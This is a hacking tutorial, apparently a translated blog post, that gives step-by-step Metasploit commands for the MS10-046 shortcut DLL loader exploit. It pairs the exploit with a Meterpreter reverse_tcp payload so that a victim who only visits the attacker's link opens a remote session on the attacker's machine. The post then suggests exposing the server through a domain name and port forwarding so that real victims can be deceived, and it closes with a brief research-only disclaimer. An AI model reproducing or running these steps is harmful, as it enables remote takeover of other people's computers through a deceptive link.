With this method, the victim only needs to click on the link the hacker sent to get the virus, the hacker does not need to entice the victim to execute the virus anymore. Managing sessions is also simpler.
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
In the previous post, I showed you how to create a backdoor, so if anyone has done it before, this article will be simpler. I also do not talk in more detail about the commands in this article, if you want to know details, please read the article. this for step-by-step details.
First in terminal, run the command “msfconsole”
Next type the command
use exploit/windows/browers/ms10_046_shortcut_icon_dllloader
Next run the following 3 commands to set the backdoor on the webserver (which is the backtrack machine) and the host receives the returned information
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.3
set LHOST 192.168.1.3
(192.168.1.3 is the backtrack machine IP address)
The next thing is to just run the command “exploit” it’s done
I went to the xp virtual machine, turned on the browser and entered the IP address of the backtrack machine
After accessing the IP address of the backtrack machine, after about 2.3 seconds, depending on the connection speed, it will automatically create 2 connection files on the hacker machine.
Now switch to the backtrack machine, we will see that there is a session connected to the backtrack machine, now just Ctrl + C to interrupt the process and start hacking.
Type the command “sessions -l” to see the list of victims, then type the command “session -i -1″ to infiltrate the victim’s machine like in the picture
The rest of the steps are for you to find out for yourself hack then you have to study hard, if it’s all over, there won’t be any good ones anymore…^^
If you want to turn the IP address into a domain name and publish it to the internet to easily deceive the victim, you just need to find a free domain name, point to the Pulic IP, and then NAT port 80 on the router to the IP of the backtrack machine.
Wish you all success and happy anniversary.. 🙂
I would also like to reiterate, my articles are shared for the purpose of research and research, not recommended to be used for bad purposes, thanks.